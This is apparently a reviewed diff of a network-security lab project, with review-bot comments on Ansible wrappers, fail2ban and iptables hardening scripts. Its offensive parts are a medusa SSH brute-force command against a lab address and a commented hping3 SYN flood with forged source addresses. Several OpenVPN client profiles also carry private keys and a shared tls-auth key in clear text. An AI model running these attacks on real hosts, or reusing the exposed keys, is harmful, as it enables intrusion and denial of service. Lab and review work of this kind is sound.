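Review bot: The wrapper has no shebang and resolves `inventory.yml` and `test_fail2ban.yml` relative to the caller's working directory, so invoking it from anywhere but `project/` fails with a missing-inventory error, and which shell interprets it depends on how it is called. Add `#!/bin/sh` and `cd "$(dirname "$0")" || exit 1` as the first two lines. A one-line comment stating what `test_fail2ban.yml` deploys would also spare the reader from opening the playbook.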

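--- a/project/ansible_iptables.sh
+++ b/project/ansible_iptables.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory.yml test_iptables_rules.yml -f 5 --ask-pass --ask-become-pass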

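--- a/project/ddos_atck_script.sh
+++ b/project/ddos_atck_script.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory_w.yml test3.yml -f 4 --ask-pass --ask-become-pass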
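Review bot: The file name says this launches the DoS exercise (`test3.yml` against the hosts in `inventory_w.yml`), but nothing in the file states what the play does or that its targets must be the lab's own worker containers, and the play itself is not visible here. A header comment is the minimum: `# Lab only: runs test3.yml (presumably the flood simulation) against the worker containers in inventory_w.yml; never point this at an inventory outside the isolated swarm network.` As with the sibling wrappers, add `#!/bin/sh` and `cd "$(dirname "$0")" || exit 1` so the relative inventory and playbook paths resolve regardless of the caller's cwd.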

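--- a/project/fail2ban_script.sh
+++ b/project/fail2ban_script.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+sudo apt-get update -y # To get the latest package lists
+sudo apt install rsyslog -y #instal auth.log
+sudo service rsyslog start #start syslog
+#grep "Failed password" /var/log/auth.log #check for login failures
+#grep "Failed password" /var/log/auth.log | awk ‘{print $11}’ | uniq -c | sort
+sudo cat /var/log/auth.log | grep "Failed password"
+#sudo apt install fail2ban -y
+sudo service fail2ban enable
+sudo service fail2ban start
+sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
+sudo sed -i '244d' /etc/fail2ban/jail.local
+sudo sed -i '239 a enabled = true' /etc/fail2ban/jail.local
+sudo sed -i '240 a maxretry = 3' /etc/fail2ban/jail.local
+sudo sed -i '241 a bantime = 300' /etc/fail2ban/jail.local
+sudo sed -i '242 a findtime = 30' /etc/fail2ban/jail.local
+sudo sed -i '243 a chain = INPUT' /etc/fail2ban/jail.local
+sudo sed -i '244 a port = 22' /etc/fail2ban/jail.local
+sudo sed -i '245 a action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]' /etc/fail2ban/jail.local
+sudo service fail2ban restart
+sudo fail2ban-client status sshd
+sudo iptables -L
+#end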
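Review bot: The `[sshd]` overrides are injected by absolute line number (`sed -i '244d'`, `'239 a enabled = true'`, …) into a full copy of jail.conf, so on any fail2ban release whose jail.conf layout differs by even one line the settings land in a different jail or delete the wrong line, and nothing checks the outcome. jail.local is meant to carry only overrides, so writing a small file with just the `[sshd]` section is both robust and exactly what the committed `workingjail.local` shows the sed dance was trying to produce. `sudo service fail2ban enable` is not an action `service(8)` understands (enable is a systemctl verb) and the `apt install fail2ban` line is commented out, so the script silently assumes the package is already installed; with no `set -e`, every one of these failures is ignored. If `set -e` is added, note that `grep "Failed password"` exits 1 when there are no failures yet and needs `|| true`.

```shell
# … unchanged: apt-get update, rsyslog install/start, auth.log grep …
sudo apt-get install -y fail2ban
# jail.local carries overrides only; do not copy jail.conf wholesale.
sudo tee /etc/fail2ban/jail.local >/dev/null <<'EOF'
[sshd]
enabled  = true
maxretry = 3
bantime  = 300
findtime = 30
chain    = INPUT
port     = 22
action_  = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
EOF
sudo service fail2ban restart
# … unchanged: fail2ban-client status sshd, iptables -L …
```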

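--- a/project/first_script.sh
+++ b/project/first_script.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+#nmap -n -sn 172.25.0.* -oG - | awk '/Up$/{print $2}'
+sudo apt-get update -y # To get the latest package lists
+sudo apt install ansible -y
+sudo apt install sshpass -y
+sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg
+ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
+#sudo tcpdump -i eth0
+#now interrupt the process. get its PID:
+#pid=$(ps -e | pgrep tcpdump)
+#echo $pid
+#
+#interrupt it:
+#sleep 5
+#kill -2 $pid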
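Review bot: `sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg` inserts at a fixed line of a file whose layout varies by Ansible version and which recent packages may not ship at all, so the line can land inside an unrelated section or the command can fail outright — and when it works, host-key checking is disabled system-wide rather than for this lab. Prefer a per-project setting that only applies when running from this directory, `printf '[defaults]\nhost_key_checking = False\n' > ansible.cfg`, or `export ANSIBLE_HOST_KEY_CHECKING=False` for the session. `apt install` is the interactive front end and warns that its CLI is not stable for scripts; use `apt-get install -y` as the update line already does. A comment marking the commented tcpdump block as a manual-capture scratchpad would also help.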

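--- a/project/hello_world.sh
+++ b/project/hello_world.sh
@@ -0,0 +1 @@
+echo "Hello World"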

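--- a/project/inventory.yml
+++ b/project/inventory.yml
@@ -0,0 +1,6 @@
+[service]
+172.21.0.2
+172.21.0.3
+172.21.0.4
+172.21.0.5
+172.21.0.6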
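Review bot: The file is in INI inventory syntax (`[service]` followed by bare addresses) but carries a `.yml` extension, so as far as I understand the plugin order Ansible's yaml inventory plugin is tried first, rejects it, and the ini plugin is what actually parses it — it works, but each run logs parser warnings and a reader expects YAML. Rename it to `inventory.ini` (or write real YAML) and update the wrapper scripts that pass `-i inventory.yml`. The hard-coded `172.21.0.2`–`172.21.0.6` addresses are whatever the compose `net` network allocated on one host; since `get_hosts` already discovers the master and worker IPs at runtime, generating this file from it would remove the manual step and the stale-address failure mode.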

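--- a/project/inventory_vpn.yml
+++ b/project/inventory_vpn.yml
@@ -0,0 +1,5 @@
+[service]
+10.80.0.3
+10.80.0.4
+10.80.0.5
+10.80.0.6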

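--- a/project/inventory_w.yml
+++ b/project/inventory_w.yml
@@ -0,0 +1,5 @@
+[service]
+172.21.0.3
+172.21.0.4
+172.21.0.5
+172.21.0.6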

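--- a/project/iptables_rules.sh
+++ b/project/iptables_rules.sh
@@ -0,0 +1,54 @@
+#!/bin/sh
+### 1: Drop invalid packets
+#iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
+### 2: Drop TCP packets that are new and are not SYN ###
+#iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
+### 3: Drop SYN packets with suspicious MSS value ###
+#iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP
+### 4: Block packets with bogus TCP flags ###
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
+### 5: Block spoofed packets ###
+#iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP
+#iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP
+#iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP
+#iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP
+#iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP
+#iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP
+#iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP
+#iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP
+#iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP
+### 7: Drop fragments in all chains ###
+#iptables -t mangle -A PREROUTING -f -j DROP
+### 8: Limit connections per source IP ###
+iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset
+### 9: Limit RST packets ###
+iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT
+iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
+### 10: Limit new TCP connections per second per source IP ###
+iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT
+iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP
+### 11:SYNPROXY
+#iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
+#iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
+#iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
+### SSH brute-force protection ###
+#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP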
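Review bot: Rule 10 is labelled "per source IP" but `-m limit` is a single global token bucket, so one flooding client exhausts the 60/s budget and the following `--ctstate NEW -j DROP` then rejects every new connection from everyone — including the Ansible controller on port 22 — which turns the protection into an easy lockout. Per-source limiting needs hashlimit: `iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m hashlimit --hashlimit-name newconn --hashlimit-mode srcip --hashlimit-upto 60/s --hashlimit-burst 20 -j ACCEPT` in place of the `-m limit` line. The SSH brute-force pair at the bottom lost its newline — the `--set` and `--update … --hitcount 10 -j DROP` commands are fused on one commented line — so uncommenting it as-is yields a single broken command; split it back into two lines. Rules are also appended with no flush or existence check, so running the script twice duplicates every rule; an `iptables -C … || iptables -A …` guard or a `-F INPUT` at the top (with the controller's access in mind) avoids that.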

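--- a/project/medusa_script.sh
+++ b/project/medusa_script.sh
@@ -0,0 +1,10 @@
+#!/bin/sh
+sudo apt-get update -y # To get the latest package lists
+sudo apt install medusa -y
+cp /project/passwd_list.txt .
+medusa -h 172.21.0.6 -u docker -P ./passwd_list.txt -M ssh -f -v 6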
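Review bot: The target `172.21.0.6` and the user `docker` are baked into the `medusa` line, so retargeting the brute-force means editing the script, and nothing prevents it from being run against a host outside the lab. Take the target as a parameter with the lab address as default — `TARGET="${1:-172.21.0.6}"` followed by `medusa -h "$TARGET" -u docker -P /project/passwd_list.txt -M ssh -f -v 6` — which also removes the `cp` of a 5 000-line wordlist into whatever the current directory happens to be. A header comment should state that this is the attack half of the fail2ban exercise and that the attacker's address is expected to be banned after `maxretry` failures, since a reader of this file alone cannot tell that outcome is intentional.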

5276
project/passwd_list.txt

File diff suppressed because it is too large

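--- a/project/ping-to-me-vpn.sh
+++ b/project/ping-to-me-vpn.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory_vpn.yml test-ping.yml -f 4 --ask-pass --ask-become-pass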

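--- a/project/script_update.sh
+++ b/project/script_update.sh
@@ -0,0 +1,8 @@
+#!/bin/sh
+sudo apt-get update -y # To get the latest package lists
+#sudo apt install hping3 -y
+#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.25.0.2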
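Review bot: The commented `hping3 … --flood --rand-source` line forges source addresses, so if it is ever uncommented on a non-isolated network the SYN backscatter lands on arbitrary third parties; the file should say so next to it: `# Lab only: --rand-source forges source IPs; run solely inside the isolated swarm network.` Its target `172.25.0.2` also does not match the `172.21.0.x` addresses used by every inventory in this change, so the address looks stale from an earlier network. As committed the script only runs `apt-get update`, which makes its name misleading; either drop it or rename it to what it does.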

110
project/sec_vpn_1.ovpn

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>
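Review bot: This profile commits live key material to the repository — the inline `<key>` block carries the client's private key and the `<tls-auth>` block carries the server's static HMAC key, which is the same key repeated in the sibling `sec_vpn_2`/`sec_vpn_3` profiles, so one leaked file exposes the shared control-channel protection of all clients. Anything pushed to a remote must be treated as compromised: revoke these client certificates, regenerate the tls-auth key on the server, and keep `*.ovpn` (or at least the inline key blocks) out of version control via `.gitignore`, distributing profiles out of band. `remote 192.168.1.5 1194 udp` pins the server to a private LAN address, so the profile only works from that LAN; a comment saying so would save the next person a connection timeout.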

110
project/sec_vpn_2.ovpn

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQC3HvMHw/05jiJc
/VY3uoigTUmlkvYKDk3G18CJ/p0zOdOAsYGEUgFBn4OV2QCDkam+uwICgNS6KgjS
l8SQ3+ULaqmMki1lWIi9o7aRxp7ioJ0UNOdVJo64G/rVloDUNCt+xeHleo7R6hFD
hqP4d4KIIPRHLFhU+IJ+tLaX5lRUMn2kZ4ezP5ERqSt0LsSZxKO4IswwAeuguvUx
tJgyu0YFV/Sq1/R/QpvWeEZO0/P+WnDL8xMo9WpRxRnWrVBlxJuhT976/Emdtjml
hDCgr478xtOyML+N7pbgDpbkJ92sTkO/ILEaY34CbuBtxHCtqFyDJ5QY37d8e9SZ
5ls2dM7fAgMBAAECggEAEuzC5xmNMQaMbJnN8EJ53j8+jjsK7G0gAp3HiztiGaov
PoyZuwgSkyqeGb1sfSxvo4OGKKYR1g+EC+eda++Hp09lqF5vDJtCvn6N3rDtOLSq
pyz0f2tVspdJrAs60zN1D0v6FZI98lnDYPwoNAR92/2z4SsnEdkA+4FHoZkvO+gz
KycoLfUZH1UMLKTFMmSX3dSxYzp7kPEZP2VBlyH1KA6/JE1G/fiyOdoYixgMcnCB
hZc0gPgJjRtwoQ8JXDz74uezGqm737tY+IA1DUoW4Ojcie3VAsPoZb300VecKuai
GT5KXMHgvnSUnSlJouGTebUvcDxlMzPhiO6CoN5gUQKBgQDcp3LQ3yJFnXTMqXmW
n7veHNcXUGQmo0H496L3c3XGcQt/smjOI/R+I3QQ1fogWBWaxvTSWjAZntMCJXD6
Tu/idtZnGF3Bxg8InpmAB9mljU0FhLkpdTCbXg+HGjkZ8NEj2/kndSGB8r49Px/6
NUJudE9VZkdiwaADaW8RAUuftwKBgQDUdFhCXwvUVsER4uZlwlRH4JgzHnClwO8r
dF7scKunMKtIStqYkfi5jc/YS4J+s2yP8KF+04NDk/PNqqvvdaak1dMVwAp/K1Pc
LZ1CqgcnuaTDhtflS/+EO7fUqazwxGqanom2NOC2sOHsGkYD8Ehb7GyhhW8KPzie
eP85mbN6GQKBgA6jnV52L1PnCmS5qbNwjYpC55JIZxyZIDtgUpOQOXQc8+JY99MV
V5c2yvCDAcE7ltNZ98ws55wLiXxO95vjuM6Ri8/zMeU1OrIbs5tm6e2t3jpLf+1c
NQlZyDXya29pJrb2VSVlBAAXFsABfCGhfvLNDKZhzsKijfcr+45pQ5cpAoGATXEv
btoYhMkuzWdJFpS0hhLPR+rzoufmBo//ve4AFAyAkvR+JBkpcfHIbo5vveGHVByh
sYpGEc8PksuAquPW38T1kbsT2HEhu2OBLHiv7QIVlhREBFgkhr4B72n+GTFvrnbV
ue4ib1WgtKCLHwpqRd+zZVkvNav/5nwyhHuLWZkCgYBky0RyDSzpm/DSZP3BvB2m
XtMat68OP6SK0SU0QT4deOM5EkOvhnkKjViRZ8f1PimDZufRz7rfEwfhEjZxrSYj
Mb7ZXFaDnzBJsxCnjq7f032SnAYD854gcdf+VrVxYfSBazcN8p8Wb0N4p8yOaVI0
iba/pI9zOZ1usvZsyy+pJQ==
-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>
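Review bot: `comp-lzo` enables link compression, and compressing attacker-influenced plaintext alongside secrets over the tunnel is the VORACLE class of attack; OpenVPN has deprecated `comp-lzo` and recommends leaving compression off. Drop the line — the server's `comp-lzo`/`compress` setting must change in step, which is not visible here — and note it in the profile: `# compression intentionally disabled (VORACLE)`. The `<key>` block here carries the client's RSA private key in the clear; once committed it must be considered compromised and revoked, regardless of whether the repository is private.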

110
project/sec_vpn_3.ovpn

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----
MIIDWDCCAkCgAwIBAgIRAOIdNBnDWhtdfZSO1oMj4YYwDQYJKoZIhvcNAQELBQAw
FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjEzWhcNMjQwMTA4
MDQ1MjEzWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzMwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCyvOI9Tz8JQoLPbLhXTTdvxGqQMqc1HDRuOWsskMI7IIaU
opR+maakYheorvcvf+f2EUwCvHGYnrwbgGSNWIm+Clh1/zwuDsWvMTOBND3UYnIj
pqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZrnfrxDyXiBi+40oEZgbzgmC0TvTwuUDY
G+IivA754kDcHrzB+AJPLYAy89Hdr2piPE47LBc2v64wiq3mXwiEHqiHwulMTr21
ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4Xa+fPafW/KxJS1cADjR6QF8tr79zDSYfC
eL9h//Or00Pl17vJrWk1r6fT9OdytM5CS+C/dEI3AgMBAAGjgaIwgZ8wCQYDVR0T
BAIwADAdBgNVHQ4EFgQUU3rhoIYQLsaMIugbI8eAgikHQwswUQYDVR0jBEowSIAU
KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB
ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV
HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAI3x+wAZ7wV7mdA4uLIPP6I72FED
gueB1cCkvFOXmrj0EGEKnQAOHlOQHX4BPkE+ZSUdzXRzt4+rN01OeE6NSG+SANKW
8rO5hYceP8sgMpgJ69on8uvKq2a/4kIWvs+lCGJCZ6oDBTMkZWoaKpnONjtrRzP9
hzHhznaKvHMsDkWf+W1IR9MYJ25JjhEsV4WUrVuLRXNTc5/RlEafHipsFNI3cJkW
pMXFwEpTyMp5pe/AGyM7Ih7u9hBUbyTnUuJUtFU4IS3Sbg8nO4srwKRJsM6GIIy6
jMGHfTeXDtYMb9xPeLc5jEKuYKY4J0cEYLBjFEN3ysczwl2ow3esjdC6qhs=
-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>
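Review bot: The inline `<key>` block commits a client private key to the repository, and the `<tls-auth>` static key at the end of this profile is byte-identical to the one in the preceding profile and in project/sec_vpn_4.ovpn and project/sec_vpn_5.ovpn (sec_vpn_4 additionally carries its private key in full clear text), so one leaked profile undoes the HMAC protection for every client. Both keys should be treated as compromised: revoke the client certificates on the CA, regenerate the tls-auth key, and keep the profiles out of version control or commit them with the `<key>` and `<tls-auth>` bodies replaced by placeholders that are filled in at deploy time. `comp-lzo` also enables compression on the tunnel, which OpenVPN deprecated after the compression-oracle (VORACLE) findings; unless the server insists on it, drop the line. Adding `*.ovpn` to `.gitignore` would prevent the next such commit.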

110
project/sec_vpn_4.ovpn

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCUA5v4Y7WOoL68
06Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTkaDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcx
CbQkr4xTp9ZU7q1GcKEvvTu4f392XaRwVZFfWSW6DFbNVa11BogtzOym6+t6Datk
NP+2Luo2vV4fHwqSXI8DYcNijxkULtUvwZowdJhSiptA6uGZi9FlS0DKx3ux2VK3
ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3L
CLn6iQKbdQV1p1sXcnjatYeXcglBTtwPu2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA
2vFPYMnXAgMBAAECggEBAJOgKe8K2+l+j97bpTjDbu9pdj7JBJ8MlnpRFFrUpCw3
RgkdnDbk1WFfhYycj44PE/njAOzexQfZ4VYKnJ6+bFJ/orkhOLd53Ho13hu9Jo8T
BNB5t72Gt6chaW3xF0kSE77ClgJCaaFZguk2Jxk5H6crJnYZyryCDq3L00k4+kVy
kCMeXGzCrlBxtucYQbVGm7F6SUQEXvyv2eCStRuwVu2gnHqckrnX1HkQ3fNmmaIv
8tqCbqbh5JBu+6l4R0xOArOGCIORNlQC5xtXFevwV7o6ZCGf64n9vvkJ02lgosUp
EUmdoAxha2CKeH3BA/ZKH8VxyfZuNgFD1/avQXQ+RWkCgYEAxJ5xfSvcvkY32HEA
6UNAUOdSLXCM+mJR0MKE+zFGAqx9auHKasOk+IKo9v/4/PgZnSjyI3WzHQ2GmJqO
iLZrCJWr60ictoBDw62ZbVWuRoJUwAYe+icLoQC/fBIuwJRXnBqGqIH0jTLnQG+O
69rSFVfEWwLPTVxSFuYI8h9DOJsCgYEAwLdK/Axy/lpy6vHphTvgihNJ1Y2lNpWO
cgb4mURMixojvY7zRaLxzbmpBU1KpfK0z+jorjGTnuQ2RTuJ9/xRKGRd6aaJfQKG
x+AiKNrslltYYo74U42Mhw810Kq/RlmdvLfb2ify9eUtuEtWhr7q95mbWLfmnCBP
CRgR8ML68XUCgYEAvx3f5LK4+/7XE70sDJEBOGLRfzey4UKmkkwx5NTNX5X4xua4
0bRga+rdgFHp3ULv6tK9IviqZOgb18QMHhlqysppdOd85OyicdcRlrQ9FW5kIM8S
V0eSxyop9tjZtvm6exNRpwPDCWjcXcbSXrGxmWtZgrmldWXyqS1qrqbyuVcCgYBN
IM6E46KeQ6rcducj6JvsBt409tSZbO+umTWjeZ88yMBnHDAmvZkS4exQb+ehVOqi
jy+Yj8TqAaHqwXJtanE8vjaLzZgXDQzOL9jcCwpG/tX31Ap0viDw6Nh74+pbiIBF
yDvYKsblPMy4hoZhtUUqxTJUJn3IHHIlTJnZht+SBQKBgF4lQMpf1acfm4aODCS9
WIArMeifjSf2m1X4qmKf+hWkha7Aq4JHAVNDCF77ktLjo72la/647PPn1Yt1tgNE
T34bY/+iTyLmOULD3EPwSKU+MsVXWUnDn6gksEix+4qCxGVR9U5g/rJc0isAMr4R
X0zX3DnM7OioFwjGVjmw4OlP
-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

110
project/sec_vpn_5.ovpn

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL
BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw
MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm
43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH
NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX
4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX
/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk
Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd
BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv
QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2
wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT
f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/
+evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN
hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H
tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg
J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw==
-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
